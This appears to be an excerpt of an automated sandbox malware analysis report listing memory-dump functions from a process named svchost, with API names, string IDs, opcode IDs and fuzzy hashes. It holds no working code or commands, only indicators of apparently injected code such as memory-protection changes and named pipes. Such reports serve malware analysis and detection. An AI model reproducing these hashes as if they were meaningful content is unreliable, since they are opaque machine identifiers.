                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: ff241bfc108c8e41cf32293f5c139143a9d96e7d242899cc36c30a4197855322
                                                                                • Instruction ID: 9c2520efcc87ac771d522e1eb6396a81ecb0ce0daac719ccbdf896b70f129e44
                                                                                • Opcode Fuzzy Hash: ff241bfc108c8e41cf32293f5c139143a9d96e7d242899cc36c30a4197855322
                                                                                • Instruction Fuzzy Hash: 07E18D72606B488AEB32DFA9D4913DD7BE2F745B98F100115EE89A7F99CB35C481CB00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308832875.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                • String ID: csm$csm$csm
                                                                                • API String ID: 849930591-393685449
                                                                                • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction ID: 8578d22811c705561b9a0c63265d0fa22d72dfafe6aec0b6b4f758a2598a20e0
                                                                                • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                                • Instruction Fuzzy Hash: 3EE18C72604B40CAEB62DBA5D4A03DD7BE2F756B98F142116EE8967F99CB34C191CF00

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: AddressFreeLibraryProc
                                                                                • String ID: api-ms-$ext-ms-
                                                                                • API String ID: 3013587201-537541572
                                                                                • Opcode ID: ec1e5874304155dc1a340afb949db992b9dfa589f06c8a0471ec677ed5d909ab
                                                                                • Instruction ID: f94411bdc3c5adc3673d068f26baf74004ea3de06b1d5fa0a00e338998d396b5
                                                                                • Opcode Fuzzy Hash: ec1e5874304155dc1a340afb949db992b9dfa589f06c8a0471ec677ed5d909ab
                                                                                • Instruction Fuzzy Hash: 4741B236313E0492EB17DB9AA8647D623E7BB45BA0F494125DD0AE7F84EE3CC44A8350

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                • String ID: d
                                                                                • API String ID: 3743429067-2564639436
                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction ID: 85125c25dfd785958ae00b37ce84ac9a8513cd9fd1755175fa0b0cf5bc826ac5
                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                • Instruction Fuzzy Hash: CC418C33214F88C6E761CFA5E45479A77E2F389B89F048129DA8957B58DF3CC489CB00
                                                                                APIs
                                                                                • FlsGetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD087
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0A6
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0CE
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0DF
                                                                                • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0F0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Value
                                                                                • String ID: 1%$Y%
                                                                                • API String ID: 3702945584-1395475152
                                                                                • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction ID: b29a2c01b9a529d3d397189201e4ebb9e472c9377beb16884566e216c47c93f0
                                                                                • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                                • Instruction Fuzzy Hash: 47112134707A8881FB6A67AF59717E963C35B847F0F1443269839F6EDAEE28C5428700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                • String ID:
                                                                                • API String ID: 190073905-0
                                                                                • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction ID: db17aeae78a532267f4925ec03955f9628ff8aa19b2b3ce37216714fce8ee9dc
                                                                                • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                • Instruction Fuzzy Hash: 7281A031602E0F86FB63ABEE98713D967D3AB45780F145415DA05F7F96EB78C8868700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                • String ID: api-ms-
                                                                                • API String ID: 2559590344-2084034818
                                                                                • Opcode ID: 9d3cf39bc7784cd844787513709c7d04fd8390ef6f847f410b46324ceba80f6d
                                                                                • Instruction ID: 8d15efdb5329dbd6f8d908350e729aaeb4b7b6a33fa5c2f06519c4c6539ee195
                                                                                • Opcode Fuzzy Hash: 9d3cf39bc7784cd844787513709c7d04fd8390ef6f847f410b46324ceba80f6d
                                                                                • Instruction Fuzzy Hash: 0E31E531213E04D1EF13DBCAA4207D523D6B759BA1F590625DD1EABB98EF38C245C710
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                • String ID: CONOUT$
                                                                                • API String ID: 3230265001-3130406586
                                                                                • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction ID: 900ef7d4bcd6fd2864e51168dc1007f1dfbbe5e213ae5e9ff28ad5abe65b03b1
                                                                                • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                • Instruction Fuzzy Hash: 2C11BF32310F4086E7629B96E8643A9B3E1F788FE5F044224EA1A97B94CF78C8058750
                                                                                APIs
                                                                                Strings
Memory Dump Source
• Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID: wr
• API String ID: 1092925422-2678910430
Memory Dump Source
• Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
Similarity
• API ID: Thread$Current$Context
• String ID:
• API String ID: 1666949209-0
Memory Dump Source
• Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID: dialer
• API String ID: 756756679-3528709123
Memory Dump Source
• Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
Similarity
• API ID: Value$ErrorLast
• String ID:
• API String ID: 2506987500-0
Memory Dump Source
• Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
Similarity
• API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
• String ID:
• API String ID: 517849248-0
Memory Dump Source
• Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
• String ID:
• API String ID: 449555515-0
Memory Dump Source
• Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
• API String ID: 2395640692-629598281
Memory Dump Source
• Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
• API String ID: 2395640692-629598281
Memory Dump Source
• Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
Similarity
• API ID: FinalHandleNamePathlstrlen
• String ID: \\?\
• API String ID: 2719912262-4282027825
Memory Dump Source
• Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
Similarity
• API ID: CombinePath
• String ID: \\.\pipe\
• API String ID: 3422762182-91387939
Memory Dump Source
• Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045
Memory Dump Source
• Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
Memory Dump Source
• Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0
Memory Dump Source
• Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
Memory Dump Source
• Source File: 00000028.00000002.3308832875.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
Memory Dump Source
• Source File: 00000028.00000002.3308832875.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: Tuesday$Wednesday$or copy constructor iterator'
• API String ID: 3215553584-4202648911
Memory Dump Source
• Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
Similarity
• API ID: CallEncodePointerTranslator
• String ID: MOC$RCC
• API String ID: 3544855599-2084237596
Memory Dump Source
• Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
Memory Dump Source
• Source File: 00000028.00000002.3308832875.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
                                                                                • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction ID: 630a7bd136e047a971954e7c30b8e6e87b54a1208c2d6339fb40a23e9a14be36
                                                                                • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                                • Instruction Fuzzy Hash: 9351AA32100B80CAEF768BA5946439877E2F355BC4F189216DB99A7FD5CB3AD490CF10
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308832875.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction ID: 545615c7cb5cd5622a5ac668a3e3931a1a855b43902fdb1261379489e8260ddb
                                                                                • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                                • Instruction Fuzzy Hash: 5F51D132701A00DBEB56CF55E464B983BEAF354BA8F548164DA1A67B88EB35D844CF04
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308832875.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                • String ID: csm$f
                                                                                • API String ID: 3242871069-629598281
                                                                                • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction ID: 1a57b68ce290c85dbce40ecbe3ad1d13c9711456f6542ae40eb2b2b77e126871
                                                                                • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                                • Instruction Fuzzy Hash: 1F31DF32201B40EAE716DF61E864B997BEAF744BD8F058054EE5B67F88DB39D940CB04
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                • String ID:
                                                                                • API String ID: 2718003287-0
                                                                                • Opcode ID: 0727f7ca33ebfc9b04e52b4205dc7bd87cee8483e25baa6158969cd42837b0ef
                                                                                • Instruction ID: f53c85bc1b1823a42c19dddbaacf5ef3270f7fc8b13c31205dca382023514cf5
                                                                                • Opcode Fuzzy Hash: 0727f7ca33ebfc9b04e52b4205dc7bd87cee8483e25baa6158969cd42837b0ef
                                                                                • Instruction Fuzzy Hash: 84D1FE32B15A8089E712CFB9D4607EC3BF2F755BA8F008216DE5AA7F99DA34C406C350
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Free
                                                                                • String ID:
                                                                                • API String ID: 3168794593-0
                                                                                • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction ID: c16a99b6eb882b57aedd9fd2cb972f0c73c4406802b17b7f20f8a29f0fc28702
                                                                                • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                                • Instruction Fuzzy Hash: 45015A32601F99D6E705DFE6E95418A77E2FB89F81F044425EA4A63B29DE38C052C750
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ConsoleErrorLastMode
                                                                                • String ID:
                                                                                • API String ID: 953036326-0
                                                                                • Opcode ID: e05ebd15e7bb07455586a63994cd1edc3763a212bc928c3d69a32a164f643882
                                                                                • Instruction ID: d41248d40368a7dadbb8de4372f2d467b08f8f1214df69f873c535610b2736e1
                                                                                • Opcode Fuzzy Hash: e05ebd15e7bb07455586a63994cd1edc3763a212bc928c3d69a32a164f643882
                                                                                • Instruction Fuzzy Hash: 1D91CE32704E5499F7629FA994A0BED3BE2F754B88F144109DE4A77F98DB74C882C720
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                • String ID:
                                                                                • API String ID: 2933794660-0
                                                                                • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction ID: ef2a4aaacd16aa62e41bbfaf996d134d739e1b6477f4088ce6822e44ce878a86
                                                                                • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                                • Instruction Fuzzy Hash: 32113C36710F058AEB10DFA0E8643E833E4F719759F440E21DA6D96BA4DF78C1998380
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 4fe0687d80f5d921ad167ff7ab4ce2b7c253e02b66b61a32e3d9e8e186ab893e
                                                                                • Instruction ID: 4b390bd35bc8d7488896d564d2b09490878af5546f8c74a14ac6cebee34a4a91
                                                                                • Opcode Fuzzy Hash: 4fe0687d80f5d921ad167ff7ab4ce2b7c253e02b66b61a32e3d9e8e186ab893e
                                                                                • Instruction Fuzzy Hash: 9371B436301F8986E726DFAD98A47EA77D6F389B84F480026DD09A3F89DE39C545C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308832875.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: CallTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 3163161869-2084237596
                                                                                • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction ID: 963f06e7ef80a2670a9323d7792bb0635a5f70e1dcd725eb12c0e0c54d3360cc
                                                                                • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                                • Instruction Fuzzy Hash: F4614636A00B84CAEB22DFA5D4903DD7BE2F349B88F045215EF4927B99DB38D595CB40
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID: \\.\pipe\
                                                                                • API String ID: 3081899298-91387939
                                                                                • Opcode ID: 95bec47cb02d8e9bc4e84beb1c736abe046d6fad30f786d8abc3baa08d9e3a7f
                                                                                • Instruction ID: 6ad79f3c6496f576d1a9b3784531bf2f01e420446c3f4c2c03693f52336387d6
                                                                                • Opcode Fuzzy Hash: 95bec47cb02d8e9bc4e84beb1c736abe046d6fad30f786d8abc3baa08d9e3a7f
                                                                                • Instruction Fuzzy Hash: CB511632206B8982F736DBAEA0B87EA77D3F386740F480125DD49A3F49DA39C505C740
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorFileLastWrite
                                                                                • String ID: U
                                                                                • API String ID: 442123175-4171548499
                                                                                • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction ID: bf4803890842cdcd72fcab1033f968f229dce80172f82f9c58987f86f410db74
                                                                                • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                                • Instruction Fuzzy Hash: 3741AF32715B8482EB219FA5E8547EAA7E2F798794F504021EE4D97B98EF3CC441CB50
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                • String ID: csm
                                                                                • API String ID: 2573137834-1018135373
                                                                                • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction ID: d9ae04a037fab9593d23b185716cfc6ae1853ea009b9f3fd067145c53b8789b8
                                                                                • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                                • Instruction Fuzzy Hash: 63116A36205F8482EB228F19F450399B7E2FB88B95F584221EE8C57B68DF3CC552CB00
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308832875.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: ierarchy Descriptor'$riptor at (
                                                                                • API String ID: 592178966-758928094
                                                                                • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction ID: 9d65062051ba8b6632479c62e9aac4e80b8205db58c6d08c9f87c8cd4192a069
                                                                                • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                                                • Instruction Fuzzy Hash: E9E08671640F44D4DF028F61E8502D833E1DB58B64F889122995C1A311FA3CD1E9C301
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308832875.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: __std_exception_copy
                                                                                • String ID: Locator'$riptor at (
                                                                                • API String ID: 592178966-4215709766
                                                                                • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction ID: 73069449200712f0ed9716194b398ac1fb7d2be99278163e9f3c6fe5041c0d1b
                                                                                • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                                                • Instruction Fuzzy Hash: 23E08671600F44D4DF028F61E4501D873E1E758B54F889122D94C1A311EA3CD1E5C300
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$AllocFree
                                                                                • String ID:
                                                                                • API String ID: 756756679-0
                                                                                • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction ID: c6ff0b059641438406dd073903249133c4bef50443ea073ae8eca436ca04cd8d
                                                                                • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                                • Instruction Fuzzy Hash: 96115135612F4881EB56DBEAE4146A977E2FB89FC0F184024DE4DA7B65DF38C452D340
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000028.00000002.3308976773.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$AllocProcess
                                                                                • String ID:
                                                                                • API String ID: 1617791916-0
                                                                                • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
